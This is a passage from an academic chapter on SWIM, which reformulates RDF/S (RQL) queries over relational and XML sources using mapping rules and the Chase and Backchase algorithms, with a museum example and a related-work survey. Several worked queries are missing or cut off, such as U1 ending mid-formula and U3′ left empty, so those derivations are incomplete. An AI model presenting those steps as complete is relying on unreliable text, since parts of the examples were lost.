where u is a tuple of variables or constants, Ei( ui )’s are class/property patterns and um=un’s are equalities between variables and/or constants. Each ui involves any subset of class ($ci and $di ), property (@pi), and resource (xi and yi) variables. The RQL conjunctive queries must be safe (i.e., their variables must be range restricted as for relational queries) (Abiteboul, Hull, & Vianu, 1995). The union of RQL conjunctive queries is defined analogously to the union of relational conjunctive queries with the difference of using query patterns instead of relational predicates. As can be seen in the following example, the translation of an RQL query into an equivalent one, which is expressed in SWLF FOL predicates is rather straightforward.
Example 1. Assume the following RQL query returning the artifacts exhibited in the Louvre museum: SELECT x FROM {x}Exhibited{y}, {y}Denom{z} WHERE z = “Louvre”
By replacing the constants found in the patterns with variables and adding the corresponding equalities we get: SELECT x FROM {x}@p1{y}, {y}@p2{z} WHERE z = “Louvre” and @p1 = Exhibited and @p2 = Denom
This query can be rewritten in the form of an RQL conjunctive query as follows: ans(x) :- {x}@p1{y}, {y}@p2{z}, z = “Louvre”, @p1 = Exhibited, @p2 = Denom
602
SWIM MAPPING RULES Mapping rules aim to resolve various heterogeneity aspects arising when interpreting data from the relational or XML sources as instances of the mediator RDF/S ontology. In this section we formally define the mapping rules and discuss their expressiveness. Definition 3. The general form of a SWIM mapping rule is a FOL formula:
φRVL ( x ) : −φRe l ( x′) , or φRVL ( x ) : −φ XML ( x′) where φRVL ( x ) is a conjunctive RVL view over the mediator ontology, φRe l ( x′) is a conjunctive query over a relational database source, φ XML ( x′) is a conjunctive path query over an XML source, and finally x ⊆ x′ . The view clauses appearing at the head of the mapping rules are under the form C(x) or P(x, y) (or equivalently in SWLF, C_EXT(C, x) and P_EXT(x, P, y) respectively) defines the direct extent of a class C or a property P. The predicates of φRel have the form R(attr1, …, attrn), where R is the name of a source relation and attr1, …, attrn are variables or constant values. The predicates of φ XML are essentially an expressive fragment (excluding only ordering and navigation with wildcards (*) or ancestor axes) of XPath 2.07 primitives under the SWLF syntax. Apart from the aforementioned predicates, in the body of a mapping rule may also exist equalities or special relational atoms. These atoms represent functions (e.g., for string handling—concat, split,
Mediating RDF/S Queries to Relational and XML Sources
etc.), that enhance mappings expressiveness (e.g., to construct unique URIs populating classes). They are non-interpreted in the sense that they are handled only during the final query translation and not during query reformulation phase (as will be discussed next). Example 2. Given the RDF/S ontology and the local sources presented in Figure 1, we can establish the mappings illustrated in Table 3. For example, for Painting(x) (a) in case of relational to RDF/S mapping, the instances of class Painting (i.e., resource URIs) are obtained by the column
Title in table Artifact if column Kind is equal to “Painting”, and (b) in case of XML to RDF/S mapping, the instances of class Painting (i.e., resource URIs) are obtained by the content of element Title, whose father Artifact is descendant of a Collection, whose child Kind is equal to “Painting”. Note that
in the XML to RDF/S mappings, variables are binded as follows: •
One variable in the case of an absolute XPath expression, which represents the content of the final node (e.g., {//Collection}(c))
Table 3. Mappings between the local sources and the RDF/S ontology Relational to RDF/S: Artifact(x) :- Artifact(x, c1, k1, e1). Painting(x) :- Artifact(x, c1, k1, e1), k1 = “Painting”. // The instances of the property Paints are the pairs of resources whose ids are the values of the //attribute Artist and attribute Title in the Artifact table respectively, if the attribute Kind is equal to //“Painting.” Paints(x,y) :- Artifact(y, x, k1, e1), k1 = “Painting.” Exhibited(x,y) :- Artifact(x, c1, k1, y). //The instances of the property Denom are the pairs of resources whose ids are the values of the //attribute Name in the Museum table. In this case resource id coincides with museums’ name. Denom(x,y) :- Museum(y, a1, o1), x=y. Museum(x) :- Museum(x, a1, o1). Cubist(x), Paints(x,y) :- Artifact(y, x, k1, e1), e1 = “Pablo Picasso Museum”. XML to RDF/S: Artifact(x) :- {//Artifact/Title}(x). Painting(x) :- {//Collection}(c), {./@Kind}(c, k1), {.//Artifact/Title}(c,x), k1 = “Painting”. // The instances of the property Paints are the pairs of resources whose ids are the values of the //attribute Artist Name and element Artifact Title, respectively, when Artist is child of Artifact and //Artifact is descendant of a Collection whose attribute Kind Collection whose attribute //Kind is equal to “Painting”. Paints(x,y) :- {//Collection}(c), {./@Kind}(c, k1), {.//Artifact}(c,a), {./Title}(a,y), {./Artist/@Name}(a,x), k1 = “Painting.” Exhibited(x,y) :- {//Museum}(m), {./@Name}(m,y), {.//Artifact/Title}(m,x). Denom(x,y) :- {//Museum}(m), {./@Name}(m,y), x=y. Museum(x) :- {//Museum/@Name}(x).
603
Mediating RDF/S Queries to Relational and XML Sources
•
Two variables in the case of a relative XPath expression -the first variable indicates the starting node of the path while the second represents the content of the path’s end (e.g., {./@Kind}(c, k1))
As has been already stated, SWIM also represents the mapping rules as DEDs (see Definition 1). Each mapping is interpreted by two constraints, as follows:
∀x ∃ψ [φ XML or Rel ( x ,ψ ) → φRVL ( x )]
(1)
∀x [φRVL ( x ) → ∃ψφ XML or Rel ( x ,ψ )]
(2)
For example, the first mapping of Table 3 is interpreted by the following two constraints: ∀x, c1, k1, e1 [Artifact(x, c1, k1, e1) → C_ EXT(Artifact,x)], and ∀x [C_EXT(Artifact,x) → ∃ c1, k1, e1 Artifact(x, c1, k1, e1)].
In the case when two or more mappings have the same head (i.e., instantiate the same ontology view) we create a constraint of the form (1) for each mapping rule, while we create unique constraint of the form (2) for all of them:
∀x [φRVL ( x ) → ∨ (∃ψ iφ XML or Rel ( x ,ψ i ))] (2′) Now let’s assume that in art.db cubists are the painters whose artifacts are exhibited in the “Pablo Picasso Museum.” In order to populate the class Cubist we should define a GLAV mapping with head: “Cubist(x), Paints(x,y)” (see Table 3). Given these mapping rules (whose head is essentially a conjunctive RVL view) we are able to extract information regarding each individual clause. For instance, the mapping for “Cubist(x), Paints(x,y)” provides also information about cubists (“Cubist(x)”) and thus, ignore the information
604
about the artifacts they painted. However, since the mapping rule’s body remains the same, the information captured by “Cubist(x)” is partial, since it considers only cubists that have painted (i.e., we don’t care for what they have actually painted). Given the previous mapping rules, we are able to establish a correspondence between any fragment of the source (a view over a relational database, a path or any XML subgraph) and any fragment of the RDF/S ontology (class, property, path, subgraph).
SWIM QUERY REFORMULATION

The SWIM query reformulation algorithm (see Table 4) relies on Chase and Backchase (Deutsch et al., 1999). In particular, the Chase is used in order to compose the initial query Q with the constraints capturing the RDF/S ontology semantics and, in a following step, with the constraints interpreting the mapping rules. The Backchase is used for finding a minimal query employing specific source predicates (e.g., the minimal query written in terms of the bodies of the source views). In order to compose a query Q with the mappings, Q should involve the direct instances of the RDF/S classes (or properties) for which we have at least one available mapping. If such a mapping exists, the Chase and Backchase algorithms can rewrite the query Q in terms of the local sources, and the rewriting is exact (or equivalence preserving). However, since we consider expressive RQL patterns, involving both schema and data querying, the unfolding of the schema information (see SWLF constraints) yields a union of queries (each of them not involving schema navigation but only direct class or property instances). As we will see in the sequel, for this union of SWLF queries the SWIM query reformulation algorithm finally computes a maximally contained rewriting (Duschka & Levy, 1997).
Table 4. Query reformulation algorithm

Input: The user query.
Given:
• A set of constraints capturing an RDF/S ontology and its semantics (see SWLF),
• A set of mappings between the RDF/S ontology and the local sources (see Table 3),
• A set of constraints defined over the local sources (see Step 3).
Output: The maximally contained reformulated query.
1. The SWLF query is chased in order to be composed with the constraints capturing the semantics of the RDF/S ontology. The result is a query, or a union of queries, expressed in terms of the view clauses (the mappings' heads).
2. Every resulting query (in the case of a union of queries) is chased with the set of mappings in order to be expressed in terms of the local sources.
3. The queries that can be expressed in terms of the local sources are backchased with the help of additional constraints (if any) coming from the local sources, in order to be minimized.
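The three steps of Table 4 can be pictured with the following high-level sketch (not the authors' implementation: chase, backchase and the three constraint sets are placeholders standing for the components described in the text):

def reformulate(swlf_query, ontology_constraints, mapping_constraints,
                source_constraints, chase, backchase):
    # Step 1: compose the query with the RDF/S ontology semantics; the result is a
    # union of queries over the view clauses (the mappings' heads).
    union_over_views = chase(swlf_query, ontology_constraints)

    # Step 2: chase every member of the union with the mappings, keeping only the
    # members that can actually be expressed in terms of the local sources.
    over_sources = [q for q in (chase(q, mapping_constraints) for q in union_over_views)
                    if q is not None]

    # Step 3: minimize each remaining query using the constraints (keys, foreign
    # keys, ...) defined over the local sources.
    return [backchase(q, source_constraints) for q in over_sources]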
Query Containment and Minimization Using Chase and Backchase

The Chase algorithm (Deutsch et al., 1999) is employed to check containment or equivalence between two queries8. The Chase comprises a sequential execution of a number of chase steps. For example, given a constraint ∀x, y A(x, y) → B(x) and the query Q(x) :- A(x, y), the chase step leads to the query Q(x) :- A(x, y), B(x). When no more chase steps can apply, the Chase ends and the resulting query is called the universal plan. Intuitively, one query is contained in another if the latter query is "included" in the universal plan of the former. However, the Chase algorithm with an arbitrary set of DEDs is not guaranteed to terminate. Thanks to the syntactic restriction introduced in Deutsch and Tannen (2003), namely stratified-witness, we can ensure termination of the Chase under a set of disjunction-free DEDs. When a set of disjunction-free DEDs respects stratified-witness, no sequence of chase steps can force the Chase to diverge: the property ensures that the constraints cannot introduce an infinite number of fresh variables in the query. Stratified-witness can be extended in order to handle constraints that use disjunction. The key idea lies in splitting the disjunctive constraints into disjunction-free ones and checking whether one of the possible combinations of disjunction-free constraints leads to an endless execution of chase steps, by checking them for stratified-witness. It is worth noticing that the set of constraints capturing a particular RDF/S ontology does not satisfy stratified-witness per se. Fortunately, it does not allow the introduction of an infinite number of fresh variables (see Serfiotis (2005) for further details). Thus, for our set of DEDs the Chase algorithm is guaranteed to terminate. Based on the results of Deutsch (2002) and Serfiotis et al. (2005), the chase-based containment algorithm for unions of conjunctive queries under a set of DEDs is sound.

Theorem 1. Given two unions of conjunctive queries Q1, Q2 and a set D of DEDs, assume that
the Chase of Q1 with D terminates, rendering the universal plan U1. Then, Q1 is contained in Q2 under D (Q1 ⊆D Q2) iff for every i there is a j such that U1i is contained in Q2j, i.e., there is a containment mapping from Q2j into U1i.
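To make the chase step concrete, the following minimal sketch (an illustration, not the actual SWIM code) applies a single dependency of the simple form A(x, y) → B(x), exactly as in the example above; atoms are represented as (predicate, terms) pairs and constraints without existential variables are assumed:

def chase_step(query_atoms, premise, conclusion):
    # For every query atom matching the premise pattern, add the correspondingly
    # instantiated conclusion atom (if it is not already present).
    result = list(query_atoms)
    for pred, args in query_atoms:
        if pred != premise[0] or len(args) != len(premise[1]):
            continue
        binding = dict(zip(premise[1], args))      # bind the constraint's variables
        derived = (conclusion[0], tuple(binding[v] for v in conclusion[1]))
        if derived not in result:
            result.append(derived)
    return result

# Q(x) :- A(x, y)   chased with   forall x, y  A(x, y) -> B(x)
q = [("A", ("x", "y"))]
print(chase_step(q, ("A", ("x", "y")), ("B", ("x",))))
# [('A', ('x', 'y')), ('B', ('x',))]   i.e.,  Q(x) :- A(x, y), B(x)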
Moreover, it is obvious that two queries Q1, Q2 are equivalent under a set D of constraints (Q1 ≡D Q2) iff Q1 ⊆D Q2 and Q2 ⊆D Q1. Query minimization is based on the Backchase algorithm, which, given a query's universal plan, checks all its subqueries for minimality and equivalence to the original query. According to the following theorem, introduced in Deutsch et al. (2003), the Backchase is guaranteed to find all minimal equivalent subqueries (when the Chase terminates), termed D-minimal query reformulations, and, in this way, it ensures the completeness of the minimization algorithm.

Theorem 2. Given a union of conjunctive queries Q and a set D of DEDs, if the Chase of Q with D terminates yielding the universal plan U, all D-minimal reformulations of Q are subqueries of U.

As far as the complexities of the Chase/Backchase algorithms are concerned, we should notice the following: the Chase applied to a conjunctive query, given a set of disjunction-free constraints satisfying stratified-witness, is a decidable problem in the complexity class NP. The Backchase searches among the candidate subqueries of the universal plan. This leads to an NP-complete problem in the number of chase sequences (i.e., an exponential number of NP-complete problems). However, approximation algorithms could be used in practice to return a minimized query instead of the minimum (Deutsch, 2002). For a thorough complexity analysis of the algorithms and the satisfaction of the stratified-witness property by the employed DEDs, readers are referred to Serfiotis (2005).

Query Reformulation

In this section, we will run step by step through our cultural example the SWIM query reformulation algorithm (see Table 4).

Step 1-2: Core Reformulation Algorithm

Example 3. The first step of the algorithm enforces the chasing of the query with the constraints capturing the semantics of the particular RDF/S ontology. Let's assume the RQL query presented in Table 1, translated into the SWLF predicates given in Example 1:

ans(x) :- P_SUB(q1, p1), P_EXT(x, q1, y), P_SUB(q2, p2), P_EXT(y, q2, z), z = "Louvre", p1 = "Exhibited", p2 = "Denom"

By chasing the query with the basic constraint (2) (for properties) we get the query:

The next chase step involves the first domain/range constraint9:

ans(x) :- P_SUB(q1, p1), P_EXT(x, q1, y), P_SUB(q2, p2), P_EXT(y, q2, z), PROP(c1, q1, d1), PROP(a1, p1, b1), PROP(c2, q2, d2), PROP(a2, p2, b2), C_SUB(c1, a1), C_SUB(d1, b1), C_SUB(c2, a2), C_SUB(d2, b2), z = "Louvre", p1 = "Exhibited", p2 = "Denom"

After a number of chase steps, we conclude to the universal plan10:

U1
ans(x) :- P_EXT(x, q1, y), P_EXT(y, q2, z), C_EXT(c1, x), C_EXT(d1, y), C_EXT(c2, y), C_EXT(d2, z), z = "Louvre", q1=
As can be seen in the universal plan U1, the union of three queries follows from the fact that class Artifact has three subclasses (Artifact itself, Painting, and Sculpture). The difference in the value of c1 (c1 = "Artifact", c1 = "Painting", c1 = "Sculpture") is the only difference between the three queries and indicates the class of which x is a direct instance. The universal plan U1 is the query that will be composed with the mappings in order to be translated into terms of the source views. This is the second step of the reformulation algorithm, whose result is the following union of queries:

U2
ans(x) :- Artifact(x, c1, k1, y), Museum(z, a1, o1), y = z, Artifact(x, c2, k2, m2), Museum(y, a2, o2), Museum(y, a3, o3), z = "Louvre"

ans(x) :- Artifact(x, c1, k1, y), Museum(z, a1, o1), y = z, Artifact(x, c2, k2, m2), k2 = "Sculpture", Museum(y, a2, o2), Museum(y, a3, o3), z = "Louvre"

The universal plan U2 follows from the replacement11 of the view clauses (P_EXT, C_EXT) with the appropriate relational to RDF/S mappings presented in Table 3. In the case of XML to RDF/S mappings (also presented in Table 3), the universal plan is:

U2′
ans(x) :- {//Museum}(m1), {./@Name}(m1,y), {.//Artifact/Title}(m1,x), {//Museum}(m2), {./@Name}(m2,z), y = z, {//Artifact/Title}(x), {//Museum/@Name}(y), {//Museum/@Name}(y), z = "Louvre"

Recall that the Chase and Backchase algorithms return exact rewritings of queries and thus, in our running example, we should find either an exact rewriting or no rewriting at all. In order to find a maximally contained rewriting, we rewrite separately (with the help of Chase and Backchase) each query of the union (at which we arrived after chasing with the constraints capturing the semantics of the RDF/S ontology). Any query having an exact rewriting is added to the union of queries that will be further processed in steps 3 and 4. Queries for which no mappings are available are discarded. For example, in the case of the universal plan U1, if we assume that there is no mapping for the class Sculpture, the universal plans U2 and U2′ will include only the first two queries.
Step 3: Improving Reformulation with Sources’ Semantics
Until now, the mediator query has been reformulated with the use of the constraints capturing only the semantics of the RDF/S ontology, and the mappings between the local sources and the RDF/S ontology. However, nothing guarantees that the computed maximally contained rewriting is free of duplicates regarding the returned source instances. In order to improve the quality of the reformulated queries (and thus reduce costly data transmissions), we also need to capture the semantics of the source data. Relational databases, for example, include integrity constraints (keys, foreign keys, etc.), while XML Schemas may specify keys, keyrefs, etc. We can express in SWLF such integrity constraints (i.e., arbitrary key and foreign key constraints) as DEDs and thus eliminate redundancies from the maximally contained queries (i.e., simplify queries and eliminate redundant ones). The general form of the DEDs employed to this end is:

∀x ∃ψ [φXML or Rel(x, ψ) → φXML or Rel(x)]

where φRel is a conjunctive query over a relational database source, and φXML is a conjunctive path query over an XML source. The advantages of this functionality are explained through the following example:

Example 4. Let's assume the universal plans U2 and U2′ presented in Example 3. Additionally, we have the following information for the local sources:

• In the relational database art.db the attribute Title is a key for the relation Artifact, while the attribute Name is a key for the relation Museum. For example, the former is expressed by the following constraint:

∀t, c, k, m, c1, k1, m1 Artifact(t, c, k, m), Artifact(t, c1, k1, m1) → c = c1, k = k1, m = m1

Additionally, the attribute Museum of the relation Artifact is a foreign key referencing the attribute Name of the relation Museum:

∀t, c, k, m ∃m1, a1, c1 Artifact(t, c, k, m), Museum(m1, a1, c1) → m = m1

• In the XML document art.xml, the attribute Name and the element Title are considered to be keys for the elements Museum and Artifact, respectively. For example, the former is expressed by the following three constraints:

∀x {//Museum}(x) → ∃y {./@Name}(x, y) (every museum has a name)
∀x, y, z {//Museum}(x), {./@Name}(x, y), {./@Name}(x, z) → y = z (for every Museum having two "names", these "names" are equal)
∀x, w, y {//Museum}(x), {./@Name}(x, y), {//Museum}(w), {./@Name}(w, y) → x = w (for every two Museums having the same "name", these Museums are the same)

By considering the previous two integrity constraints, the application of step 3 of the reformulation algorithm yields the following queries:

U3
ans(x) :- Artifact(x, c1, k1, y), y = "Louvre"

and U3′
We can easily observe that the first query of U3 (as well as U3’) contains the other two (the other two are restrictions of the first one). Since there is a union operator between them, step 3 (Backchase) will return only this query. Finally, the reformulated query is translated back to the syntax of the local sources, namely XQuery/XPath and SQL (for details readers are referred to Koffina [2006]). To conclude, the first step of the algorithm uses Chase and Backchase in order to find the universal plan whose predicates are the view clauses (C_EXT, P_EXT). This step is sound and complete. The second step rewrites the query in terms of the local sources. Since this rewriting also relies on Chase and Backchase, we guarantee that in this step we get queries that are not only correct (are rewritten in terms of the local sources) but also complete (Backchase ensures that all possible queries are subqueries of the universal plan). The same is true for the third step of the algorithm. Hence, the SWIM query reformulation algorithm is sound and complete.
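As an aside, the Backchase search behind Theorem 2 can be pictured with the following minimal sketch (an illustration only: the equivalence test, which in SWIM is itself chase-based, is passed in as a callback, and the toy predicate below merely stands in for it):

from itertools import combinations

def backchase(universal_plan_atoms, is_equivalent):
    # Keep the subqueries (subsets of the universal plan's atoms) that are still
    # equivalent to the original query and minimal, i.e., no equivalent proper
    # subquery exists (Theorem 2: every D-minimal reformulation is such a subquery).
    atoms = list(universal_plan_atoms)
    equivalent = [frozenset(s) for n in range(1, len(atoms) + 1)
                  for s in combinations(atoms, n) if is_equivalent(set(s))]
    return [set(s) for s in equivalent if not any(t < s for t in equivalent)]

# Toy stand-in: pretend any subquery mentioning both A and B is equivalent.
plan = [("A", ("x", "y")), ("B", ("x",)), ("C", ("y",))]
print(backchase(plan, lambda sub: {"A", "B"} <= {p for p, _ in sub}))
# [{('A', ('x', 'y')), ('B', ('x',))}]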
RELATED WORK AND CONCLUSION

In the literature, we can distinguish between data exchange and data integration systems (see Table 5). The former (also known as data translation) migrate and restructure data from a source schema according to a target schema (e.g., a mediator ontology), while the latter provide mechanisms for uniformly querying different sources through a target schema and thus avoid materializing it in advance. In both cases, mappings are established for translating data from the source schemas to the target schema, and they usually adopt one of the following three approaches. The first, global-as-view (GAV), describes the target schema in terms of the local schemas. This approach facilitates query reformulation, but it is at a disadvantage with respect to source evolution/addition/deletion. Unlike GAV, in the local-as-view (LAV) approach every source schema is described in terms of the target one. This eases the addition/deletion of local sources but renders query reformulation more intricate. Based on these approaches, there is a hybrid called global-local-as-view (GLAV) that provides easy source evolution/addition/deletion, while the query reformulation algorithm is no harder than in LAV. GLAV offers more expressive mappings, allowing one to specify which fragment (i.e., a view) of the target schema matches a fragment of the source ones. Based on this classification, we position the data publishing and query reformulation services of SWIM with respect to related projects.

GAV mappings are employed in PEPSINT (Cruz et al., 2004; Xiao et al., 2004), WEESA (Klein, 2002; Reif et al., 2004) and FDR2 (Korotkiy et al., 2004) to integrate or publish relational and XML data sources using RDF/S ontologies. The employed mapping rules allow populating RDF/S classes (or concepts) with data from the relations or the XML elements of the local sources. Besides the richer form of mapping (GLAV) supported by our framework, SWIM also avoids a preliminary translation of source data and schema into local ontologies, which are then mapped to a mediator ontology. The latter limitation is tackled by a number of recently developed exchange tools also following the GAV approach, like Virtuoso12, SquirrelRDF13, RDF Gateway14, D2RQ15, D2RMap (Bizer, 2003), the Elena project wrapper (Miklos et al., 2005), and Information Integrator (Angele & Gesmann, 2006). Furthermore, compared to Lehti et al. (2004), employing OWL both for the representation of the mediator ontology and for the specification of the mappings, SWIM supports arbitrary disjunctive queries in mappings (rather than equivalence/intersection/union of OWL classes and properties), while users are exposed only to the mediator ontology (and not its merge with the local ones). A noteworthy mapping system for OWL-DL ontologies has been presented in Haase and Motik (2005), where mappings are expressed as correspondences between conjunctive queries over ontologies (GLAV approach). Given that query answering within such a setting is undecidable (see also Goasdoue and Rousset (2004) for detailed complexity results on query answering using description logics-based frameworks), the authors introduce suitable restrictions to express mappings in OWL-DL extended with the so-called DL-safe subset of the Semantic Web rule language (SWRL). Obviously, the proposed system is not designed to support mappings to relational and XML sources. We also plan to investigate in the future how SWRL can be exploited to express SWIM queries/views and mapping rules. LAV mappings are employed in Benatallah et al. (2005) and Styx (Amann et al., 2002; Fundulaki, 2002) to integrate e-Catalogs and XML sources using a subset of OWL-Lite or ER schemas. In Benatallah et al. (2005), mappings specify lexical relationships between concepts (synonymy,
Table 5. Expressiveness of mappings and related systems

Data integration systems:
• GAV — Materialized: PEPSINT (Cruz et al., 2004; Xiao et al., 2004); Virtual: (Lehti et al., 2004)
• GAV and limited LAV — Virtual: Piazza (Halevy et al., 2003; Tatarinov et al., 2003; Tatarinov et al., 2004)
• LAV — Virtual: Styx (Amann et al., 2002), (Goasdoue et al., 2004), (Benatallah et al., 2005), DartGrid (Chen et al., 2006b)
• GLAV — Virtual: (Yu & Popa, 2004), (Haase et al., 2005)

Data exchange systems:
• GAV — (Klein, 2002), WEESA (Reif et al., 2004), FDR2 (Korotkiy et al., 2004), Virtuoso, SquirrelRDF, RDF Gateway, D2RQ, D2RMap (Bizer, 2003), Elena Wrapper (Miklos et al., 2005), Information Integrator (Angele et al., 2006)
• GLAV — Clio (Miller, Hernandez, Haas, Yan, Ho, Fagin & Popa, 2001; Miller et al., 2000; Velegrakis, 2005), MAPONTO (An et al., 2005)
hypernymy, etc.), while the maximally contained query (which is actually a class description) is computed in polynomial time using hypergraph techniques. The low complexity bounds of the query reformulation algorithm are achieved by reducing the expressiveness of the language employed to specify mappings and queries. Styx (Amann et al., 2002; Fundulaki, 2002), like SWIM, uses XPath expressions in order to establish the mappings between the sources and the mediator ontology. However, Styx proves soundness and completeness only for mapping rules employing a limited fragment of XPath expressions (i.e., attribute and child axes), and does not take into account constraints defined on the XML sources. The recently proposed DartGrid integration system also employs LAV mappings (Chen et al., 2006a, 2006b) to define each relational table as a view over the mediator ontologies. The proposed reformulation algorithm is bound (as in SWIM) by the well-known complexity of the query rewriting problem using views (NP-complete), while the paper does not address query containment and minimization issues (in the presence of constraints both at the mediator ontology and the source schemas). Unlike Piazza (Halevy, Ives, Mork & Tatarinov, 2003; Tatarinov & Halevy, 2004), employing GAV and a limited form of LAV mappings, SWIM is able to capture the semantics of the RDF/S data model (e.g., subsumption relationships between classes or properties, and not simply its XML syntax), while exploiting constraints defined both over the ontologies and the source schemas. Finally, Clio (Miller, Haas, & Hernandez, 2000; Velegrakis, 2005) provides users with an effective mechanism for semi-automatically generating GLAV mappings between target and source ontologies, relieving them from the arduous and time-consuming task of generating and managing mappings in the case of source evolution. Although an automatic inference of mappings from simple predicate correspondences between relational schemas and mediator ontologies is difficult, it
would be a great enhancement to SWIM if some candidate mapping suggestions could be provided beforehand (as recently proposed for LAV mappings in An, Borgida, & Mylopoulos (2005)). However, the constraints actually considered by Clio (defined over the source and the target schemas) are embedded dependencies instead of the DEDs considered by SWIM, which are necessary for capturing the (subsumption) semantics of an RDF/S ontology.
REFERENCES

Abiteboul, S., Hull, R., & Vianu, V. (1995). Foundations of databases. Addison Wesley.

Amann, B., Beeri, C., Fundulaki, I., & Scholl, M. (2002). Querying XML sources using an ontology-based mediator. In Proceedings of the 10th International Conference on Cooperative Information Systems (CoopIS), Irvine, California.

An, Y., Borgida, A., & Mylopoulos, J. (2005). Building semantic mappings from databases to ontologies. In Proceedings of the 21st National Conference on Artificial Intelligence (AAAI), Boston, MA.

Angele, J., & Gesmann, M. (2006). Data integration using semantic technology: A use case. In Proceedings of the 3rd Annual European Semantic Web Conference (ESWC), Budva, Montenegro.

Benatallah, B., Hacid, M., Paik, H., Rey, C., & Toumani, F. (2005). Towards semantic-driven, flexible, and scalable framework for peering and querying e-catalog communities. Information Systems International Journal, special issue on Semantic Web.

Bizer, C. (2003). D2R Map--A database to RDF mapping language. Poster at WWW. Budapest, Hungary.

Chen, H., Wang, Y., Wang, H., Mao, Y., Tang, J., Zhou, C., Yin, A., Cui, M., & Wu, Z. (2006). From legacy relational databases to the semantic Web: An in-use application for traditional Chinese medicine. In Proceedings of the 5th International Semantic Web Conference (ISWC) In Use Track, Athens, GA, USA.

Chen, H., Wu, Z., Wang, H., & Mao, Y. (2006). RDF/RDFS-based relational database integration. In Proceedings of the 22nd International Conference on Data Engineering (ICDE) Industrial Session, Athens, GA, USA.

Cluet, S., Delobel, C., Simeon, J., & Smaga, K. (1998). Your mediators need data conversions! In Proceedings of the ACM SIGMOD (pp. 177-188). Seattle, USA.

Cruz, I. F., Xiao, H., & Hsu, F. (2004). Peer-to-peer semantic integration of XML and RDF data sources. The 3rd AP2PC Workshop. New York City, USA.

Deutsch, A. (2002). XML query reformulation over mixed and redundant storage. PhD thesis, University of Pennsylvania.

Deutsch, A., & Tannen, V. (2003). Reformulation of XML queries and constraints. In Proceedings of ICDT (pp. 225-241). Italy.

Deutsch, A., Popa, L., & Tannen, V. (1999). Physical data independence, constraints and optimization with universal plans. In Proceedings of VLDB (pp. 459-470). Edinburgh.

Duschka, O., & Levy, A. (1997). Recursive plans for information gathering. In Proceedings of IJCAI (pp. 778-784). Nagoya, Japan.

Friedman, M., Levy, A., & Millstein, T. (1999). Navigational plans for data integration. In Proceedings of the 16th National Conference on Artificial Intelligence (AAAI) (pp. 67-73). Orlando, Florida, USA.

Fundulaki, I. (2002). Integration et Interrogations de Resources XML pour Communautes Web. PhD thesis, CNAM Paris.

Goasdoue, F., & Rousset, M. C. (2004). Answering queries using views: A KRDB perspective for the semantic Web. ACM Transactions on Internet Technology, 4(3), 255-288.

Haase, P., & Motik, B. (2005). A mapping system for the integration of OWL-DL ontologies. In Proceedings of the 1st International Workshop on Interoperability of Heterogeneous Information Systems (pp. 9-16). Bremen, Germany.

Haase, P., Broekstra, J., Eberhart, A., & Volz, R. (2004). A comparison of RDF query languages. In Proceedings of the 3rd International Semantic Web Conference (ISWC) (pp. 502-517). Japan.

Halevy, A., Ives, Z., Mork, P., & Tatarinov, I. (2003). Piazza: Data management infrastructure for semantic Web applications. In Proceedings of the 12th International World Wide Web (WWW) Conference. Budapest, Hungary.

Harmelen, F., & McGuinness, D. (2004). OWL Web ontology language overview. W3C Recommendation.

Hayes, P. (2004). RDF semantics. W3C Recommendation.

Karvounarakis, G., Alexaki, S., Christophides, V., Plexousakis, D., & Scholl, M. (2002). RQL: A declarative query language for RDF. In Proceedings of the 11th International World Wide Web (WWW) Conference (pp. 592-603). Honolulu, Hawaii.

Klein, M. (2002). Interpreting XML via an RDF schema. In Proceedings of DEXA. Aix-en-Provence, France.

Koffina, I. (2005). Integrating XML data sources using RDF/S schemas. Master's thesis, University of Crete.

Korotkiy, M., & Top, J. (2004). From relational data to RDF/S model. In Proceedings of the International Conference on Web Engineering. Munich, Germany.

Lee, J., & Goodwin, R. (2005). The semantic Webscape: A view of the semantic Web. In Proceedings of the 14th International World Wide Web (WWW) Conference (pp. 1154-1155). Chiba, Japan.

Lehti, P., & Fankhauser, P. (2004). XML data integration with OWL: Experiences and challenges. In Proceedings of the 3rd International Symposium on Applications and the Internet (SAINT) (pp. 160-170). Tokyo, Japan.

Levy, A., Rajaraman, A., & Ordille, J. (1996). Querying heterogeneous information sources using source descriptions. In Proceedings of the 22nd International Conference on Very Large Databases (VLDB) (pp. 251-262). Bombay, India.

Magkanaraki, A., Tannen, V., Christophides, V., & Plexousakis, D. (2003). Viewing the semantic Web through RVL lenses. In Proceedings of the 2nd International Semantic Web Conference (ISWC) (pp. 96-112). Sanibel Island, Florida, USA.

Manola, F., & Miller, E. (2004). RDF primer. W3C Recommendation.

Miklos, Z., & Sobernig, S. (2005). Query translation between RDF and XML: A case study in the educational domain. In Proceedings of the Workshop on Interoperability of Web-Based Educational Systems. Chiba, Japan.

Miller, R. J., Haas, L., & Hernandez, M. (2000). Clio: Schema mapping as query discovery. In Proceedings of VLDB (pp. 77-88). Cairo, Egypt.

Miller, R. J., Hernandez, M., Haas, L., Yan, L., Howard Ho, C. T., Fagin, R., & Popa, L. (2001). The Clio project: Managing heterogeneity. SIGMOD Record, 30(1), 78-83.

Papakonstantinou, Y., Garcia-Molina, H., & Widom, J. (1995). Object exchange across heterogeneous information sources. In Proceedings of the 11th IEEE International Conference on Data Engineering (ICDE) (pp. 251-260). Taipei, Taiwan.

Reif, G., Jazayeri, M., & Gall, H. (2004). Towards semantic Web engineering: WEESA—mapping XML schema to ontologies. In Proceedings of the WWW2004 Workshop on Application Design, Development, and Implementation Issues in the Semantic Web. New York, USA.

Serfiotis, G. (2005). Optimizing and reformulating RQL queries on the semantic Web. Master's thesis, University of Crete.

Serfiotis, G., Koffina, I., Christophides, V., & Tannen, V. (2005). Containment and minimization of RDF/S query patterns. In Proceedings of the 4th International Semantic Web Conference (ISWC), Galway, Ireland.

Tatarinov, I., & Halevy, A. (2004). Efficient query reformulation in peer data management systems. In Proceedings of the ACM SIGMOD (pp. 539-550). Paris, France.

Tatarinov, I., Ives, Z., Madhavan, Y., Halevy, A., Suciu, D., Dalvi, N., (Luna) Dong, X., Kadiyska, Y., Miklau, G., & Mork, P. (2003). The Piazza peer data management project. SIGMOD Record, 32(3), 47-52.

Velegrakis, Y. (2005). Managing schema mappings in highly heterogeneous environments. PhD thesis, University of Toronto.

Xiao, H., & Cruz, I. (2004). RDF-based metadata management in peer-to-peer systems. In Proceedings of the 2nd IST MMGPS Workshop. London.

Yu, C., & Popa, L. (2004). Constraint-based XML query rewriting for data integration. In Proceedings of the ACM SIGMOD (pp. 371-382). Paris, France.
ENDNOTES

1. The underlined attributes denote keys, while those in italics denote foreign keys.
2. Constraints for properties can be defined in a similar way.
